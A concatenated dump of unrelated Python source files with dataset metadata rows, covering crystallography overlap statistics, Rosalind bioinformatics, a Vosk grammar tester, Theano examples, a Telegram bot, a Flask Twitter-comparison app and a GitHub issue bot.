x01, x11, y01, y11, z01, _ = bbox1
x02, x12, y02, y12, z02, _ = bbox2
# get submasks of both shoeboxes for the overlapping area
sub_mask1 = mask1[
(z - z01), (y0 - y01) : (y1 - y01), (x0 - x01) : (x1 - x01)
]
sub_mask2 = mask2[
(z - z02), (y0 - y02) : (y1 - y02), (x0 - x02) : (x1 - x02)
]
# create background and foreground masks for both shoeboxes
array1_fg = np.zeros(sub_mask1.shape, dtype=int)
array1_bg = np.zeros(sub_mask1.shape, dtype=int)
array2_fg = np.zeros(sub_mask2.shape, dtype=int)
array2_bg = np.zeros(sub_mask2.shape, dtype=int)
# detect foreground and background pixels on submasks
array1_fg += (sub_mask1 & 5) == 5
array2_fg += (sub_mask2 & 5) == 5
array1_bg += (sub_mask1 & 3) == 3
array2_bg += (sub_mask2 & 3) == 3
# count overlaps
fg_fg[index1] += np.any(np.logical_and(array1_fg, array2_fg))
fg_fg[index2] += np.any(np.logical_and(array1_fg, array2_fg))
bg_bg[index1] += np.any(np.logical_and(array1_bg, array2_bg))
bg_bg[index2] += np.any(np.logical_and(array1_bg, array2_bg))
fg_bg[index1] += np.any(np.logical_and(array1_fg, array2_bg))
fg_bg[index2] += np.any(np.logical_and(array1_bg, array2_fg))
bg_fg[index1] += np.any(np.logical_and(array1_bg, array2_fg))
bg_fg[index2] += np.any(np.logical_and(array1_fg, array2_bg))
return fg_fg, fg_bg, bg_fg, bg_bg
def write_output_lists_pixel(self, res, total, bg, fg, bg_fg):
"""This function writes a text file containing the lists of the
average resolution of the bins and the overlaps per pixel per bin.
:param list res: list with resolution per bin
:param list total: list of total overlaps per bin
:param list bg: list of background overlaps per bin
:param list fg: list of foreground overlaps per bin
:param list bg_fg: list of background foreground overlaps per bin
"""
name_outfile = self.outputfile_l + "_pixel.txt"
with open(name_outfile, "w") as outfile:
for r, t, f, b, bf in zip(res, total, fg, bg, bg_fg):
outfile.write("%f, %f, %f, %f, %f\n" % (r, t, f, b, bf))
def write_output_total_pixel(self, ratio_total, ratio_bg, ratio_fg, ratio_bg_fg):
"""This function writes a text file containing the average
overlaps per pixel of the dataset.
:param float ratio_total: average total overlap ratio
:param float ratio_bg: average background overlap ratio
:param float ratio_fg: average foreground overlap ratio
:param float ratio_bg_fg: average background foreground overlap ratio
"""
text = [
"total overlap ratio:",
"foreground overlap ratio:",
"background overlap ratio:",
"background foreground overlap ratio:",
]
data = [ratio_total, ratio_fg, ratio_bg, ratio_bg_fg]
name_outfile = self.outputfile_t + "_pixel.txt"
with open(name_outfile, "w") as outfile:
for t, d in zip(text, data):
outfile.write("%s, %f\n" % (t, d))
def write_output_lists_shoebox(self, res, total_f, total_b, bg, fg, bg_fg, fg_bg):
"""This function writes a text file containing the lists of the
average resolution of the bins and the overlaps per shoebox per bin.
:param list res: list with resolution per bin
:param list total: list of total overlaps per bin
:param list bg: list of background overlaps per bin
:param list fg: list of foreground overlaps per bin
:param list bg_fg: list of background foreground overlaps per bin
"""
name_outfile = self.outputfile_l + "_shoebox.txt"
with open(name_outfile, "w") as outfile:
for r, tf, tb, f, b, fb, bf in zip(
res, total_f, total_b, fg, bg, fg_bg, bg_fg
):
outfile.write(
"%f, %f, %f, %f, %f, %f, %f\n" % (r, tf, tb, f, b, fb, bf)
)
def write_output_total_shoebox(self, ratio_total, ratio_bg, ratio_fg, ratio_bg_fg):
"""This function writes a text file containing the average overlaps
per shoebox of the dataset.
:param float ratio_total: average total overlap ratio
:param float ratio_bg: average background overlap ratio
:param float ratio_fg: average foreground overlap ratio
:param float ratio_bg_fg: average background foreground overlap ratio
"""
text = [
"total overlap ratio:",
"foreground overlap ratio:",
"background overlap ratio:",
"background foreground overlap ratio:",
]
data = [ratio_total, ratio_fg, ratio_bg, ratio_bg_fg]
name_outfile = self.outputfile_t + "_shoebox.txt"
with open(name_outfile, "w") as outfile:
for t, d in zip(text, data):
outfile.write("%s, %f\n" % (t, d))
def prepare_data(self):
"""
This function extracts dimensions of the imageset the resolutions
per pixel and the minimum and maximum resolution of the imagesets from
the input file.
:returns: number of images, width and height of the images, minimum and maximum
resolutions and a resolution list per pixel
"""
# get input from expt file
experiments = ExperimentListFactory.from_json_file(self.inputfile)
assert len(experiments) == 1
imageset = experiments[0].imageset
beam = experiments[0].beam
detector = experiments[0].detector
panel = detector[0]
# get dimensions of the dataset
y_dim = imageset.get_raw_data(0)[0].all()[0]
x_dim = imageset.get_raw_data(0)[0].all()[1]
z_dim = len(imageset)
print("Number of images in dataset:", z_dim)
# write resolution array
resolution = self.np_resolution(x_dim, y_dim, panel, beam)
print("Read in resolutions.")
# get vmin, vmx and number of bins
vmin = np.amin(resolution)
vmax = np.amax(resolution)
return z_dim, y_dim, x_dim, vmin, vmax, resolution
def count_overlaps_per_reflection(self):
"""
The function that counts overlaps per reflection.
        :returns: total overlap ratio per shoebox, foreground overlap
                  ratio per shoebox, background overlap ratio per shoebox,
                  background/foreground overlap ratio per shoebox
"""
start_main = timer()
# get dimensions of imageset and resolution values
z_dim, y_dim, x_dim, vmin, vmax, resolution = self.prepare_data()
# prepare the bins
num_bins = self.num_bins
d2_list, intervall = self.prepare_bins_shoebox(vmax, vmin, num_bins)
# prepare the lists containing the overall overlap counts and ratios
ratio_fg_fg = [0] * num_bins
ratio_fg_bg = [0] * num_bins
ratio_bg_fg = [0] * num_bins
ratio_bg_bg = [0] * num_bins
ratio_total_f = [0] * num_bins
ratio_total_b = [0] * num_bins
sum_fg_fg = [0] * num_bins
sum_fg_bg = [0] * num_bins
sum_bg_fg = [0] * num_bins
sum_bg_bg = [0] * num_bins
sum_total_f = [0] * num_bins
sum_total_b = [0] * num_bins
# loop through all images
for z in range(z_dim):
start = timer()
filename = "shoeboxes_" + str(z) + ".pickle"
# get shoeboxes and resolutions from pickle file
reflections = flex.reflection_table.from_pickle(filename)
resolution = reflections["d"].as_numpy_array()
            d2_shoebox = np.array([1 / (d ** 2) for d in resolution])
shoebox = reflections["shoebox"]
no_shoeboxes = len(shoebox)
# assign shoeboxes to resolution bins
index_array, weight = self.assign_shoebox_to_resolution_bin(
d2_shoebox, vmin, vmax, intervall
)
            # count overlaps for each shoebox
fg_fg, fg_bg, bg_fg, bg_bg = self.write_overlaps_per_shoebox(
reflections, shoebox, y_dim, x_dim, z
)
            # prepare lists containing overlap counts and ratios per image
ratio_fg_fg_im = [0] * num_bins
ratio_fg_bg_im = [0] * num_bins
ratio_bg_fg_im = [0] * num_bins
ratio_bg_bg_im = [0] * num_bins
ratio_total_f_im = [0] * num_bins
ratio_total_b_im = [0] * num_bins
sum_fg_fg_im = [0] * num_bins
sum_fg_bg_im = [0] * num_bins
sum_bg_fg_im = [0] * num_bins
sum_bg_bg_im = [0] * num_bins
sum_total_f_im = [0] * num_bins
sum_total_b_im = [0] * num_bins
# add counts to resolution bins
for f, fb, bf, b, i in zip(fg_fg, fg_bg, bg_fg, bg_bg, index_array):
if weight[i] > 0:
ratio_fg_fg_im[i] += f / weight[i]
ratio_fg_bg_im[i] += fb / weight[i]
ratio_bg_fg_im[i] += bf / weight[i]
ratio_bg_bg_im[i] += b / weight[i]
ratio_total_f_im[i] += (f + fb + b) / weight[i]
ratio_total_b_im[i] += (f + bf + b) / weight[i]
sum_fg_fg_im[i] += f
sum_fg_bg_im[i] += fb
sum_bg_fg_im[i] += bf
sum_bg_bg_im[i] += b
sum_total_f_im[i] += f + fb + b
sum_total_b_im[i] += f + bf + b
ratio_fg_fg[i] += f / (weight[i] * z_dim)
ratio_fg_bg[i] += fb / (weight[i] * z_dim)
ratio_bg_fg[i] += bf / (weight[i] * z_dim)
ratio_bg_bg[i] += b / (weight[i] * z_dim)
ratio_total_f[i] += (f + fb + b) / (weight[i] * z_dim)
ratio_total_b[i] += (f + bf + b) / (weight[i] * z_dim)
sum_fg_fg[i] += f / (z_dim)
sum_fg_bg[i] += fb / (z_dim)
sum_bg_fg[i] += bf / (z_dim)
sum_bg_bg[i] += b / (z_dim)
sum_total_f[i] += (f + fb + b) / (z_dim)
sum_total_b[i] += (f + bf + b) / (z_dim)
# calculate overall overlap ratios of the current image
overall_ratio_fg_fg_im = sum(sum_fg_fg_im) / no_shoeboxes
overall_ratio_fg_bg_im = sum(sum_fg_bg_im) / no_shoeboxes
overall_ratio_bg_fg_im = sum(sum_bg_fg_im) / no_shoeboxes
overall_ratio_bg_bg_im = sum(sum_bg_bg_im) / no_shoeboxes
overall_ratio_total_im = sum(sum_total_f_im) / no_shoeboxes
end = timer()
# print output
print("Image no.:", z + 1)
print("No. of shoeboxes:", no_shoeboxes)
print("total overlap ratio per shoebox", overall_ratio_total_im)
print("foreground overlap ratio per shoebox", overall_ratio_fg_fg_im)
print("background overlap ratio per shoebox", overall_ratio_bg_bg_im)
print(
"foreground background overlap ratio per shoebox",
overall_ratio_fg_bg_im,
)
print(
"background foreground overlap ratio per shoebox",
overall_ratio_bg_fg_im,
)
print("Time taken: ", end - start)
# calculate overall overlap ratios of the whole dataset
overall_ratio_fg_fg = sum(sum_fg_fg) / no_shoeboxes
overall_ratio_fg_bg = sum(sum_fg_bg) / no_shoeboxes
overall_ratio_bg_fg = sum(sum_bg_fg) / no_shoeboxes
overall_ratio_bg_bg = sum(sum_bg_bg) / no_shoeboxes
overall_ratio_total = sum(sum_total_f) / no_shoeboxes
end_main = timer()
# print output
print("Overlap statistics for whole dataset:")
print("total overlap ratio per shoebox", overall_ratio_total)
print("foreground overlap ratio per shoebox", overall_ratio_fg_fg)
print("background overlap ratio per shoebox", overall_ratio_bg_bg)
print("foreground background overlap ratio per shoebox", overall_ratio_fg_bg)
print("background foreground overlap ratio per shoebox", overall_ratio_bg_fg)
# write output files
self.write_output_lists_shoebox(
d2_list,
ratio_total_f,
ratio_total_b,
ratio_bg_bg,
ratio_fg_fg,
ratio_fg_bg,
ratio_bg_fg,
)
self.write_output_total_shoebox(
overall_ratio_total,
overall_ratio_bg_bg,
overall_ratio_fg_fg,
overall_ratio_bg_fg,
)
print("Time taken for imageset: ", end_main - start_main)
return (
overall_ratio_total,
overall_ratio_fg_fg,
overall_ratio_bg_bg,
overall_ratio_bg_fg,
)
def count_overlaps_per_pixel(self):
"""The function that counts the overlaps per pixel on an image dataset.
:returns: overall averages for the whole imageset (total, bg, fg, bg_fg)
"""
start_main = timer()
z_dim, y_dim, x_dim, vmin, vmax, resolution = self.prepare_data()
print(x_dim, y_dim)
num_bins = self.num_bins
# get bin labels(middle of resolution range) array with size of image with
# indices of bin the resolution is in and weight of each bin
d2_list, index_array, weight = self.prepare_bins_pixel(
vmax, vmin, num_bins, resolution
)
print("Prepared bins.")
count_bg = [0] * num_bins
count_fg = [0] * num_bins
count_bg_fg = [0] * num_bins
count_total = [0] * num_bins
# loop through all images
for z in range(z_dim):
start = timer()
filename = "shoeboxes_" + str(z) + ".pickle"
# get shoeboxes from pickle file
reflections = flex.reflection_table.from_pickle(filename)
shoebox = reflections["shoebox"]
# write masks of background of shoeboxes and foreground of shoeboxes
n_background, n_foreground = self.write_bg_and_fg_mask(
reflections, shoebox, y_dim, x_dim, z
)
# prepare lists that will contain count of different kinds of overlap
# per resolution bin for the current image
count_bg_im = [0] * len(d2_list)
count_fg_im = [0] * len(d2_list)
count_bg_fg_im = [0] * len(d2_list)
# fill lists of overlap counts
            for bg, fg, index in zip(
n_background.reshape(-1), n_foreground.reshape(-1), index_array
):
count_bg_im[index] += bg * (bg - 1) / 2
count_fg_im[index] += fg * (fg - 1) / 2
count_bg_fg_im[index] += bg * fg
bg_ratio_im = []
fg_ratio_im = []
bg_fg_ratio_im = []
total_ratio_im = []
bin = 0
# calculate ratios of overlaps (no. of overlaps in bin/no. of pixels in bin)
# add count of overlaps of image to overall counts
for b, f, bf, w in zip(count_bg_im, count_fg_im, count_bg_fg_im, weight):
bg_ratio_im.append(b / w)
fg_ratio_im.append(f / w)
bg_fg_ratio_im.append(bf / w)
total_ratio_im.append(b / w + f / w + bf / w)
count_fg[bin] += f
count_bg[bin] += b
count_bg_fg[bin] += bf
count_total[bin] += b + f + bf
bin += 1
# print output
print("Image no.:", z + 1)
print("No. of shoeboxes:", len(shoebox))
print(
"total overlap ratio",
(sum(count_bg_im) + sum(count_fg_im) + sum(count_bg_fg_im))
/ sum(weight),
)
print("foreground overlap ratio", sum(count_fg_im) / sum(weight))
print("background overlap ratio", sum(count_bg_im) / sum(weight))
print(
"background foreground overlap ratio", sum(count_bg_fg_im) / sum(weight)
)
end = timer()
print("Time taken for image:", end - start)
# ratio of overlaps per resolution bin
ratio_total = []
ratio_bg = []
ratio_fg = []
ratio_bg_fg = []
for t, b, f, bf, w in zip(count_total, count_bg, count_fg, count_bg_fg, weight):
ratio_total.append(t / (w * z_dim))
ratio_bg.append(b / (w * z_dim))
ratio_fg.append(f / (w * z_dim))
ratio_bg_fg.append(bf / (w * z_dim))
# calculate the average overlap ratios for the dataset
ratio_total_dataset = (sum(count_bg) + sum(count_fg) + sum(count_bg_fg)) / (
sum(weight) * z_dim
)
ratio_fg_dataset = sum(count_fg) / (sum(weight) * z_dim)
ratio_bg_dataset = sum(count_bg) / (sum(weight) * z_dim)
ratio_bg_fg_dataset = sum(count_bg_fg) / (sum(weight) * z_dim)
end_main = timer()
# print output
print("Overlap statistics for whole dataset:")
print("total overlap ratio", ratio_total_dataset)
print("foreground overlap ratio", ratio_fg_dataset)
print("background overlap ratio", ratio_bg_dataset)
print("background foreground overlap ratio", ratio_bg_fg_dataset)
# write output files
self.write_output_lists_pixel(
d2_list, ratio_total, ratio_bg, ratio_fg, ratio_bg_fg
)
self.write_output_total_pixel(
ratio_total_dataset, ratio_bg_dataset, ratio_fg_dataset, ratio_bg_fg_dataset
)
print("Time taken for dataset:", end_main - start_main)
return (
ratio_total_dataset,
ratio_fg_dataset,
ratio_bg_dataset,
ratio_bg_fg_dataset,
)
def main(self):
if self.run_shoeboxes:
total, fg, bg, bg_fg = self.count_overlaps_per_reflection()
else:
total, fg, bg, bg_fg = self.count_overlaps_per_pixel()
return total, fg, bg, bg_fg
def run():
"""Allows overlapping_spots to be called from command line."""
import argparse
parser = argparse.ArgumentParser(description="command line argument")
parser.add_argument(
"--inputfile",
dest="inputfile",
type=str,
help="The name of the json file that contains the reflection table.",
default="13_integrated.expt",
)
parser.add_argument(
"--num_bins",
dest="num_bins",
type=int,
help="The number of resolution bins",
default=50,
)
parser.add_argument(
"--outputfile_l",
dest="outputfile_l",
type=str,
help="The name of the output file that contains the lists of the overlaps per resolution bin.",
default="overlap_lists",
)
parser.add_argument(
"--outputfile_t",
dest="outputfile_t",
type=str,
help="The name of the output file that contains the average overlaps of the dataset",
default="overlap_total",
)
parser.add_argument(
"--run_shoeboxes",
dest="run_shoeboxes",
type=bool,
help="The boolean which decides whether overlaps per shoebox should be run.",
default=True,
)
parser.add_argument(
"--run_pixel",
dest="run_shoeboxes",
help="Sets run_shoeboxes to false.",
action='store_false',
)
args = parser.parse_args()
overlap_counter = OverlapCounter(
args.inputfile,
args.num_bins,
args.outputfile_l,
args.outputfile_t,
args.run_shoeboxes,
)
overlap_counter.main()
if __name__ == "__main__":
run()
| true |
f062ca3ae0bdae0412c8da652896e108764d9054
|
Python
|
gittenberg/rosalind
|
/Finding a Shared Motif.py
|
UTF-8
| 810 | 3.140625 | 3 |
[] |
no_license
|
# https://en.wikibooks.org/wiki/Algorithm_Implementation/Strings/Longest_common_substring#Python_3
from Bio import SeqIO
input_file = 'rosalind_lcsm.txt'
with open(input_file) as f:
fasta_sequences = list(SeqIO.parse(f, 'fasta'))
sequences = [str(fasta.seq) for fasta in fasta_sequences]
def long_substr(data):
substr = ''
if len(data) > 1 and data[0]:
for i in range(len(data[0])):
for j in range(len(data[0]) - i + 1):
if j > len(substr) and is_substr(data[0][i: i + j], data):
substr = data[0][i: i + j]
return substr
def is_substr(find, data):
if len(data) < 1 and len(find) < 1:
return False
for dat in data:
if find not in dat:
return False
return True
print(long_substr(sequences))
| true |
4008b2b25e909f87aa36747e74371b26692549f9
|
Python
|
Lirein/vosk-server
|
/websocket/test_gram.py
|
UTF-8
| 3,474 | 2.828125 | 3 |
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env python3
import os
import sys
import pathlib
import random
import re
def readFile(path: str) -> list:
read_data = []
with open(path, "r") as f:
read_data = f.readlines()
return read_data
def parseGram(grammar: tuple) -> tuple:
gramdata = {}
publicgrams = {}
for line in grammar:
line = line.strip()
if line.startswith('<') and line.find('=') != -1 and line.find(';') != -1:
key = line[1:line.index('>')]
value = line[line.index('=')+1:line.index(';')].strip()
value = value.replace('*', '.*')
# value = value.replace(')', '){1}')
value = value.replace('[', '(')
value = value.replace(']', '){0,1}')
start = 0
while(value.find('<', start)!=-1 and value.index('>', start)!=-1):
gram = value[value.index('<', start)+1:value.index('>', start)].strip()
gramregexp = gramdata.pop(gram)
start = value.index('<', start)
value = value.replace(value[start:value.index('>', start)+1], '(' + gramregexp + ')')
start += len(gramregexp)+1
value = value.strip()
if value[-1] == '|':
value = value[0:-1]
value = value.replace('(', '(<')
value = value.replace(')', '>)')
value = value.replace(' ', '><')
value = value.replace(')>', ')')
value = value.replace('<|', '|')
value = value.replace('|>', '|')
value = value.replace('<(', '(')
value = value.replace('}>', '}')
value = value.replace('<<', '<')
value = value.replace('>>', '>')
if not value[0] in ['(', '<']:
value = '<' + value
if not value[-1] in [')', '}', '>']:
value = value + '>'
value = value.replace('<', '\\s*\\b')
value = value.replace('>', '\\b\\s*')
value = value.replace('\\b\\b', '\\b')
value = value.replace('\\b\\s*\\b', '\\b')
gramdata[key] = value
if line.startswith('public ') and line.find('=') != -1 and line.find(';') != -1:
key = line[line.index('<')+1:line.index('>')]
value = line[line.index('=')+1:line.index(';')].strip()
grams = []
while(value.find('<')!=-1 and value.index('>')!=-1):
gram = value[value.index('<')+1:value.index('>')].strip()
grams.append(gram)
value = value.replace(value[value.index('<'):value.index('>')+1], '')
publicgrams[key] = grams
return gramdata, publicgrams
def testPhrase(phrase: str, grams: dict, validgrams: tuple):
matchedgram = 'unknown'
for gram in validgrams:
pattern = re.compile(grams[gram])
if pattern.search(phrase):
matchedgram = gram
break
return matchedgram
phrases = ['соединение установлено пожалуйста подождите', 'я вас слушаю внимательно', 'по какой рекламе']
file = readFile(str(pathlib.Path(__file__).parent.absolute().joinpath('test.gram')))
grams, publicgrams = parseGram(file)
phrase = phrases[random.randint(0, len(phrases)-1)]
print('Test pharse '+phrase)
for variant in publicgrams:
print('Variant '+variant+': '+testPhrase(phrase, grams, publicgrams[variant]))
| true |
004e09d1fd8687702d589e52b9190c9d9e534525
|
Python
|
beatrizgoa/TFM
|
/LearningTheano/Ejemplos_sencillos_theano.py
|
UTF-8
| 2,929 | 3.5625 | 4 |
[] |
no_license
|
import theano
import theano.tensor as T
print '----------------------'
print 'Function'
print '---------------------'
###################
# LOGISTIC FUNCTION:
###################
# Define the symbolic variable as a matrix
x = T.dmatrix('x')
# Define the sigmoid
s = 1 / (1 + T.exp(-x))
# Build the function whose input is x and whose output is the
# value of the sigmoid expression
logistic = theano.function([x], s)
# Pass a matrix to the compiled function
RES = logistic([[0, 1], [-1, -2]])
print 'Result of the logistic function:'
print RES
print '----------------------'
print 'Multiple outputs'
print '---------------------'
############################
# FUNCTIONS WITH MULTIPLE OUTPUTS
############################
# Define variables
M = T.dmatrix('M')
N = T.dmatrix('N')
# They can also be defined like this:
M, N = T.dmatrices('M', 'N')
dif1 = M - N
dif2 = abs(M - N)
dif3 = (M - N)**2  # Squaring uses ** and not ^
# Build the function
diferencias = theano.function(inputs=[M, N], outputs=[dif1, dif2, dif3])
# Pass the arguments to the function
res2 = diferencias([[1, 1], [1, 1]], [[0, 1], [2, 3]])
print 'Showing dif1'
print res2[0]
print 'Showing dif2'
print res2[1]
print 'Showing dif3'
print res2[2]
print '----------------------'
print 'Default arguments'
print '---------------------'
###############################
# DEFAULT VALUES FOR ARGUMENTS
################################
# Variables can also be defined together
x, y, w = T.dscalars('x', 'y', 'w')
# Operation:
z = (x + y) * w
# Function
f = theano.function([x, theano.Param(y, default=1), theano.Param(w, default=2, name='w_by_name')], z)
# y defaults to 1 when no value is supplied for that input.
print 'single input x=10, defaults y=1, w=2'
r1 = f(10)
print r1
print 'inputs x=10 y=5, default w=2'
r2 = f(10, 5)
print r2
print 'inputs x=10 y=5 and w=1'
r3 = f(10, 5, w_by_name=1)
print r3
# If you build another function and want to refer to w by a different name:
prueba = x + y + w
f2 = theano.function([x, theano.Param(y, default=3), theano.Param(w, default=2, name='Valor_w')], prueba)
print 'inputs x=10 y=5 and w=1 for prueba'
hola = f2(10, 5, Valor_w=1)
print hola
print '----------------------'
print 'Shared variables'
print '---------------------'
#########################################
# SHARED VARIABLES
#########################################
# Create the shared variable, initialised to zero
state = theano.shared(0)
inc = T.iscalar('inc')
acumulador = theano.function([inc], state, updates=[(state, state+inc)])
decrecesor = theano.function([inc], state, updates=[(state, state-inc)])
# Each function takes inc, returns the current value of state, and then updates state to state + inc (or state - inc)
a = state.get_value()
print a
aa = acumulador(2)
print aa
a = state.get_value()
print a
aa = acumulador(3)
print aa
bb = decrecesor(2)
print bb
a = state.get_value()
print a
| true |
1b68affb3d87351c40f3d3472ba14c0698ce40bb
|
Python
|
AdamZhouSE/pythonHomework
|
/Code/CodeRecords/2417/60734/265174.py
|
UTF-8
| 265 | 2.859375 | 3 |
[] |
no_license
|
lst = list(map(int,input().split(',')))
max_n = min(lst)
flag = True
for i in range(2,max_n+1):
count = 0
for index in range(len(lst)):
if lst[index]%i == 0:
count+=1
if count==len(lst):
flag = False
break
print(flag)
| true |
17f79789fb4dbfa4a050cbf0f499e6570b70182d
|
Python
|
hitaitengteng/mytool
|
/自然语言处理/textcompareutil.py
|
UTF-8
| 347 | 2.75 | 3 |
[] |
no_license
|
from difflib import Differ
a="17.3如发包方有证据认为承包方无法完全履行本合同而承包方无法提供有效的担保时,"
b="173如发包方有证虽“为采包方无法完全用行木合同而承包方无法提供有效的担保时"
d = Differ()
diff = d.compare(a.splitlines(), b.splitlines())
print('\n'.join(list(diff)))
| true |
2274b2b394702b0c8f403492c66bc98f54ccba40
|
Python
|
tjsdud594/BasicClass
|
/06.Crawling/4.selenium/step03mypagesearch.py
|
UTF-8
| 634 | 3.15625 | 3 |
[] |
no_license
|
# Mission: make this work with a Google search as well, following the same approach as step01
from selenium import webdriver
import time  # used to pause execution briefly (sleep, in seconds)
driver = webdriver.Chrome("c:/driver/chromedriver")
driver.get("http://127.0.0.1:5500/4.selenium/step03mypage.html")
# input tag
search_box = driver.find_element_by_name("data")
# button tag
# find the search button
btn = driver.find_element_by_id("btn")  # locate the element by its id attribute
search_box.send_keys("encore")
# search_box.send_keys("hihihi")
# clicking the button invokes the JS function bound to the search button
btn.click()
time.sleep(10)
driver.quit()
| true |
d9281e89c000a3b6511793b74caab0d1aee7297d
|
Python
|
artemii-yanushevskyi/RemoteRetail
|
/TelegramBots/AsyncTelegramPython.py
|
UTF-8
| 3,150 | 2.53125 | 3 |
[] |
no_license
|
"""
This is an echo bot.
It echoes any incoming text messages.
"""
import asyncio
import logging, time
from aiogram import Bot, Dispatcher, executor, types, exceptions
# to run aiogram we should create
# a new environment 'conda create --name py36 python=3.6' (/anaconda3/envs/py37)
# to activate it 'conda activate py37'
from bot_token import bot_token as BOT_TOKEN
# Configure logging
logging.basicConfig(level=logging.INFO)
log = logging.getLogger('broadcast')
# Initialize bot and dispatcher
bot = Bot(token=BOT_TOKEN, parse_mode='Markdown')
dp = Dispatcher(bot)
# User Settings
CHAT_ID = -378550435 # the PythonTelegram Group
affirmative = ['мерси', 'thanks', 'ok', '👌', '👍']
messages_bot = []
current_time = time.asctime(time.localtime(time.time()))
# Handlers
@dp.message_handler(commands=['start', 'help'])
async def send_welcome(message: types.Message):
"""
This handler will be called when client send `/start` or `/help` commands.
"""
intro_message = '*The bot had been started.* Current date and time\n_%s_' % current_time
await message.reply(intro_message)
async def send_message(user_id: int, text: str, disable_notification: bool = False) -> types.Message:
"""
Safe messages sender
:param user_id:
:param text:
:param disable_notification:
:return:
"""
try:
msg = await bot.send_message(user_id, text, disable_notification=disable_notification)
except exceptions.BotBlocked:
log.error(f"Target [ID:{user_id}]: blocked by user")
except exceptions.ChatNotFound:
log.error(f"Target [ID:{user_id}]: invalid user ID")
except exceptions.RetryAfter as e:
log.error(f"Target [ID:{user_id}]: Flood limit is exceeded. Sleep {e.timeout} seconds.")
await asyncio.sleep(e.timeout)
return await send_message(user_id, text) # Recursive call
except exceptions.UserDeactivated:
log.error(f"Target [ID:{user_id}]: user is deactivated")
except exceptions.TelegramAPIError:
log.exception(f"Target [ID:{user_id}]: failed")
    else:
        log.info(f"Target [ID:{user_id}]: success")
        return msg
    return None  # a handled exception above means no message was sent
@dp.message_handler(regexp='(^dog[s]?$|hound)')
async def dog(message: types.Message):
with open('data/dog.jpg', 'rb') as photo:
await bot.send_photo(message.chat.id, photo, caption='Dog is here 🐶',
reply_to_message_id=message.message_id)
@dp.message_handler(regexp='(^timer ?$)')
async def timer(message: types.Message):
timer = 300
msg = await send_message(message.chat.id, 'Start timer: %d' % timer)
try:
while True:
if await bot.edit_message_text('timer: %d' % timer, msg.chat.id, msg.message_id):
timer -= 1
# await asyncio.sleep(1)
if timer == 0:
break
    finally:
        timer = 300
        log.info(f"Timer handler finished; counter reset to {timer}.")
@dp.message_handler()
async def echo(message: types.Message):
await bot.send_message(message.chat.id, message.text)
if __name__ == '__main__':
executor.start_polling(dp, skip_updates=True)
| true |
bfb4ab1330697ec65392963bd8e25cad45bd345b
|
Python
|
SaraWestWA/TwitOff_SW
|
/twitoff/round_one/app_old.py
|
UTF-8
| 3,019 | 2.75 | 3 |
[
"MIT"
] |
permissive
|
'''"""'''
from flask import Flask, render_template, request
from flask_sqlalchemy import SQLAlchemy
from dotenv import load_dotenv
import os
from .db_model import DB, User, Tweet
from .twitter import add_user_tweepy, update_all_users
from .predict import predict_user
import traceback
load_dotenv()
def create_app():
'''Create and configure an instance of the Flask application.'''
app = Flask(__name__)
app.config.update(
SQLALCHEMY_DATABASE_URI=os.getenv('DATABASE_URL'),
SQLALCHEMY_TRACK_MODIFICATIONS=os.getenv('TRACK_MODS')
)
DB.init_app(app) #connect Flask app to SQAlchemy DB
@app.route('/')
def root():
return render_template('base.html', title='Home',users=User.query.all())
@app.route('/user', methods=['POST'])
@app.route('/user/<name>', methods=['GET'])
def user(name=None, message=''):
name = name or request.values['username']
try:
if request.method == 'POST':
name = request.values['user_name']
print('Name: ',name)
if name == '':
message = 'Please select or enter a user name.'
tweets = []
else:
add_user_tweepy(name)
message = 'Tweets by {}!'.format(name)
tweets = User.query.filter(User.username == name).one().tweet
else:
            tweets = User.query.filter(User.username == name).one().tweet
except Exception as e:
traceback.print_exc()
message = f'''Error adding {name}. Is the name on the user list in any form?
Just click it.
If not, user may not exist, check spelling and try again.'''
tweets = []
return render_template('user.html', title=name, tweets=tweets, message=message)
# @app.route('/compare', methods=['POST'])
# def compare(message =''):
# user1 = request.values['user1']
# user2 = request.values['user2']
# tweet_text = request.values['tweet_text']
# if user1 == user2:
# message = 'Two different users must be provided to compare!'
# else:
# prediction = predict_user(user1, user2, tweet_text)
# message = f''' "{tweet_text} " is more likely to be said by {user1 if prediction else user2}
# than {user2 if prediction else user1}'''
# return render_template('predict.html', title='Prediction', message=message)
@app.route('/reset')
def reset():
DB.drop_all()
DB.create_all()
return render_template('base.html', title='Database has been reset!', users=User.query.all())
@app.route('/update', methods=['GET'])
def update():
update_all_users()
return render_template('base.html', title='All tweets updated!', users=User.query.all())
return app
# if __name__ == "__main__":
# app.run(debug=True)
"""
| true |
bb4ec6c8ae33056f681450fe4e2e69730b9b0544
|
Python
|
Aasthaengg/IBMdataset
|
/Python_codes/p03337/s732659715.py
|
UTF-8
| 66 | 2.9375 | 3 |
[] |
no_license
|
a,b=map(int,input().split())
ans=max(a+b,a-b)
print(max(ans,a*b))
| true |
12fd64dc24c1a8d967b9249f90ef55dbdb4eb40a
|
Python
|
Flood1993/ProjectEuler
|
/p433.py
|
UTF-8
| 421 | 3.09375 | 3 |
[] |
no_license
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 25 11:39:15 2013
@author: guillermo
"""
cont = 0
def gcd(n, m):
global cont
cont += 1
if n == m:
return
elif m > n:
return gcd(m, n)
# elif m == 1:
# return
    elif n % m != 0:
        return gcd(m, n % m)  # Euclid's step: recurse on (m, n mod m)
benchmark = 11000
for i in range(1, benchmark):
for j in range(1, benchmark):
gcd(i, j)
print cont
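# Sanity check (illustrative): Euclid on (10, 6) makes the calls (10,6) -> (6,4) -> (4,2),
# so a fresh run of gcd(10, 6) adds 3 to cont, and gcd(6, 10) adds 4 (one extra swap call).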
| true |
a8a9a2df9e80ee45868c8b1ed1e65fba290f3fb3
|
Python
|
jaggergit/bot-tester
|
/issue-bot/handler.py
|
UTF-8
| 2,380 | 2.765625 | 3 |
[] |
no_license
|
import requests, json, os, sys
from github import Github
def handle(req):
"""handle a request to the function
Args:
req (str): request body
"""
event_header = os.getenv("Http_X_Github_Event")
req_user_agent = os.getenv("Http_User_Agent")
sys.stderr.write("User Agent: " + req_user_agent + "\n")
if not event_header == "issues":
sys.exit("Unexpected X-GitHub-Event: " + event_header)
gateway_hostname = os.getenv("gateway_hostname", "gateway")
#Converts JSON to Python objects
payload = json.loads(req)
if not payload["action"] == "opened":
sys.stderr.write("payload action != open .. exiting \n")
return
#sentimentanalysis invokation
res = requests.post('http://' + gateway_hostname + ':8080/function/sentimentanalysis', data=payload["issue"]["title"]+" "+payload["issue"]["body"])
sys.stderr.write("post call to sentimentanalysis - return code: " + str(res.status_code) + "\n")
if not res.status_code == 200:
